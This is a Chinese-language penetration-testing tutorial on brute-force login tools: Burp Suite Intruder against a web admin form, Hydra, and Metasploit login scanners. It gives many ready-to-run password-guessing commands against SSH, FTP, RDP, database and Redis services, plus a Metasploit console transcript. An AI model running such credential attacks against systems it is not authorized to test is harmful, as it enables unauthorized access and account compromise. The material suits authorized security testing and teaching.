渗透测试-穷举工具介绍

渗透测试-穷举(暴力破解)工具介绍

01 渗透测试-穷举工具分类

02 Web网页穷举

2.1 BurpSuite

2.1.1 BurpSuite介绍

Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。
所有的工具都共享一个能处理并显示HTTP 消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架。
Burp Suite是一个集成化的渗透测试工具，它集合了多种渗透测试组件，使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。在渗透测试中，我们使用Burp Suite将使得测试工作变得更加容易和方便，即使在不需要娴熟的技巧的情况下，只有我们熟悉Burp Suite的使用，也使得渗透测试工作变得轻松和高效。

模块介绍：
burp suite包括以下几个模块

proxy：代理，默认地址是127.0.0.1，端口是8080
target：站点目标，地图
spider：爬虫
scanner：漏洞扫描
repeater：http请求消息与响应消息修改重放
intruder：暴力破解
sequencer：随机数分析
decoder：各种编码格式和散列转换
comparer：可视化差异对比功能

说白了，burp suite（也简写成bp）是一个用来抓包改包的工具。上面说的那么多模块，也不一定每一个在平时都能用得到。我们用的最多的，有proxy代理模块、repeater模块以及intruder模块。

2.1.2 对网站后台进行暴力破解

使用BP抓包->穷举暴力破解网站后台账号密码。

使用火狐浏览器FoxyProxy插件设置代理，将访问请求转发burpsuite的8080端口

burpsuite成功抓到请求数据包，并获取到数据包中的请求信息
将请求包，发送给Intruder模块，进行暴力破解。
针对pwd变量添加变量
将密码字典表导入到BurpSuite，并开始攻击。
密码爆破成功！！！

根据返回的状态码status 或者length 网页长度对其进行判断。这里得到正确得密码是123456.

根据状态码一般测试正确的是现实302 状态码另外就是响应网页的长度

03 密码爆破

3.1 常见口服务穷举工具

3.1.1 hydra

命令行暴力破解工具，支持多种协议、SSH、rdp、ftp、mysql、oracle等等。

网站：https://github.com/vanhauser-thc/thc-hydra

https://www.thc.org/
https://www.thc.org/releases/hydra-8.4.tar.gz
hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户，对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
-P FILE 大写，指定密码字典。
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数，默认为16。
-w TIME 设置最大超时的时间，单位秒，默认是30s。
-v / -V 显示详细过程。

service 指定服务名，支持的服务和协议：telnetftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 sshsmtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。

ssh
hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V
ftp
hydra -L /root/user -P /root/passwd ftp://192.168.1.0 -f -o /root/crack.txt -V
rdp
hydra -L /root/user -P /root/passwd rdp://192.168.1.0 -f -o /root/crack.txt -V
mssql
hydra -L /root/user -P /root/passwd mssql://192.168.0.129 -f -o /root/crack.txt -v
mysql
hydra -L /root/user -P /root/passwd mysql://192.168.0.129 -f -o /root/crack.txt –v -s 3306
oracle
hydra -P /root/passwd oracle://192.168.0.129 -f -o /root/crack.txt –v
redis
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis
postgresql 弱口令检测
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql
指定多个ip进行穷举
hydra -L /root/user -P /root/passlist -M /root/ip.txt  -V -o /root/crack mysql -t 16
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f -o /root/crack.txt
hydra -L /root/user -P /root/passlist ftp://192.168.0.106 -vV -f -o /root/crack.txt
hydra -l sa -P /root/passlist mssql://192.168.0.103 –vV

3.1.2 xhydra

kali 自带图形化暴力破解工具、支持ip代理

3.1.3 msfconsole

非常好用的暴力破解工具，支持多少种认证协议。有企业版和社区版。

auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login

用法：
use 选择模块
search 查询模块
set 设置
show options 查询设置
back 返回
info 查询模块的信息
exploit/run 运行模块

查询于ssh_login相关的模块：

进入 ssh_login模块：

查看ssh_login支持的参数：

设置password参数为root：

msf6 auxiliary(scanner/ssh/ssh_login) > set password root
password => root
msf6 auxiliary(scanner/ssh/ssh_login) > info

       Name: SSH Login Check Scanner
     Module: auxiliary/scanner/ssh/ssh_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  todb <todb@metasploit.com>

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  PASSWORD          root             no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             22               yes       The target port
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads (max one per host)
  USERNAME                           no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           false            yes       Whether to print output for all attempts

Description:
  This module will test ssh logins on a range of machines and report 
  successful logins. If you have loaded a database plugin and 
  connected to a database this module will record successful logins 
  and hosts so you can track your access.

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0502

msf6 auxiliary(scanner/ssh/ssh_login) >